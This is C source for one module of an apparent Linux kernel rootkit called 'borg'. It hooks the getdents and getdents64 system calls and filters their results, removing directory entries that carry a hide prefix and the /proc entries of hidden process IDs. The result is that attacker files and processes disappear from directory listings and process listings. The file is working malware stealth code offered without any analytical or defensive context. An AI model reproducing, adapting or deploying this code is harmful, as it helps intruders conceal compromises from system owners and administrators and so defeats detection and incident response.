/**
 * @file getdents64.c
 * @brief Hide files.
 */

#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/fs.h>
#include <linux/file.h>
#include <linux/dirent.h>
#include <linux/smp_lock.h>
#include <linux/uaccess.h>
#include <linux/proc_fs.h>
#include "borg.h"
#include "process.h"
#include "getdents64.h"

asmlinkage long (*original_getdents64)(unsigned int, void *dirent, unsigned int);
asmlinkage long (*original_getdents)(unsigned int, void *dirent, unsigned int);

int proc_atoi(const char *str)
{
    int ret = 0, mul = 1;
    const char *ptr;

    /* Point to the end of str. */    
    for( ptr = str; *ptr; ptr++)
	;
    ptr--;
    
    /* Walk str backwards. */
    while(ptr >= str)
    {
	/* Is it a number? */
	if(*ptr < '0' || *ptr > '9')
	    break;
	
	/* Add the number as decimal. */
	ret += (*ptr - '0') * mul;
	mul *= 10;
	
	/* Point to next number. */
	ptr--;
    }
    _DEBUG(("%s: found /proc/%d\n", BORG_VERSION, ret));
    return ret;
}

asmlinkage long borg_getdents64(unsigned int fd, void *dirent, unsigned int count)
{
    long ret;

    /* Lock CPU's on SMP systems. */
    lock_kernel();
    /* Invoke the original getdents. */
    ret = original_getdents64(fd, dirent, count);
    
    /* Failure? */
    if(ret <= 0)
    {
	unlock_kernel();
	return ret;
    }
    /* Retrieve a filtered set of linux_dirent64 structures. */
    ret = borg_dirents(DIRENT64, ret, fd, dirent, count);
    /* Unlock SMP CPU's. */
    unlock_kernel();
    /* Return. */
    return ret;
}

asmlinkage long borg_getdents(unsigned int fd, void *dirent, unsigned int count)
{
    long ret;

    /* Lock CPU's on SMP systems. */
    lock_kernel();
    /* Invoke the original getdents. */
    ret = original_getdents(fd, dirent, count);
    
    /* Failure? */
    if(ret <= 0)
    {
	unlock_kernel();
	return ret;
    }
    /* Retrieve a filtered set of linux_dirent structures. */
    ret = borg_dirents(DIRENT, ret, fd, dirent, count);
    /* Unlock SMP CPU's. */
    unlock_kernel();
    /* Return. */
    return ret;
}

int borg_should_hide(int proc, char *name)
{
    return (strncmp(name, BORG_HIDE_STRING, strlen(BORG_HIDE_STRING)) == 0) ||
	   (proc && process_is_hidden(proc_atoi(name)));
}

long borg_dirents(int type, long origret, unsigned int fd, void *dirent, unsigned int count)
{
    struct linux_dirent64 *mydirent64 = NULL;
    struct linux_dirent   *mydirent   = NULL;
    
    struct inode *inode = NULL;
    struct file *file = NULL;
    struct super_block *sb = NULL;
    char *p = NULL, *mydir = NULL, *dest = NULL;
    long myret = 0;
    int proc = 0;

    _DEBUG(("%s: borg_dirent()\n", BORG_VERSION));
    _DEBUG(("%s: borg_dirent(): reading fd %d\n", BORG_VERSION, fd));

    /* Obtain the file struct from the fd. */
    if((file = fget(fd)) == NULL)
    {
	unlock_kernel();
	return -EBADF;
    }
    /* Get superblock and inode entries for this file descriptor. */
    sb = file->f_dentry->d_sb;
    inode = file->f_dentry->d_inode;
    
    /* Are we reading /proc? */
    if(inode->i_ino == PROC_ROOT_INO)
    {
	_DEBUG(("%s: borg_getdents(): reading /proc\n", BORG_VERSION));
	proc = 1;
    }
    /* Allocate space to copy the dirent struct(s). */
    mydir = kmalloc(origret, GFP_KERNEL);
    dest  = kmalloc(origret, GFP_KERNEL);
    
    /* Make a copy of the dirent struct(s). */
    if(copy_from_user(mydir, dirent, origret) != 0)
	return -EBADF;

    /* We will alter this copy. */
    p = mydir;

    /* Now loop the results, and strip all that match BORG_HIDE_STRING. */
    while(origret > 0)
    {
	if(type == DIRENT64)
	{
    	    /* Fetch the next dirent64 struct. */
	    mydirent64 = (struct linux_dirent64 *) p;
	
	    if(!borg_should_hide(proc, mydirent64->d_name))
	    {
		_DEBUG(("%s: borg_dirent(): WRITING dirent64 '%s'\n", BORG_VERSION, mydirent64->d_name));
	    
		/* Copy this dirent, and increment our ret. */
	        memcpy(dest + myret, mydirent64, mydirent64->d_reclen);
		myret += mydirent64->d_reclen;
	    }
	    else
    		/* Just print it out for now. */
	        _DEBUG(("%s: borg_dirent(): HIDING dirent64 '%s'\n", BORG_VERSION, mydirent64->d_name));
	
	    /* Move pointer. */
	    origret -= mydirent64->d_reclen;
	    p += mydirent64->d_reclen;
	}
	else
	{
	    /* Fetch next dirent struct. */
	    mydirent = (struct linux_dirent *) p;
	
	    if(!borg_should_hide(proc, mydirent->d_name))
	    {
		_DEBUG(("%s: borg_dirent(): WRITING dirent '%s'\n", BORG_VERSION, mydirent->d_name));
	    
		/* Copy this dirent, and increment our ret. */
	        memcpy(dest + myret, mydirent, mydirent->d_reclen);
		myret += mydirent->d_reclen;
	    }
	    else
    		/* Just print it out for now. */
	        _DEBUG(("%s: borg_dirent(): HIDING dirent '%s'\n", BORG_VERSION, mydirent->d_name));
	
	    /* Move pointer. */
	    origret -= mydirent->d_reclen;
	    p += mydirent->d_reclen;
	}
    }
    /* Overwrite the dirent with our stripped version. */
    if(copy_to_user(dirent, dest, myret) != 0)
	myret = -EBADF;
    
    /* Free allocated memory. */
    kfree(mydir);
    kfree(dest);
    
    /* Return. */
    return myret;
}
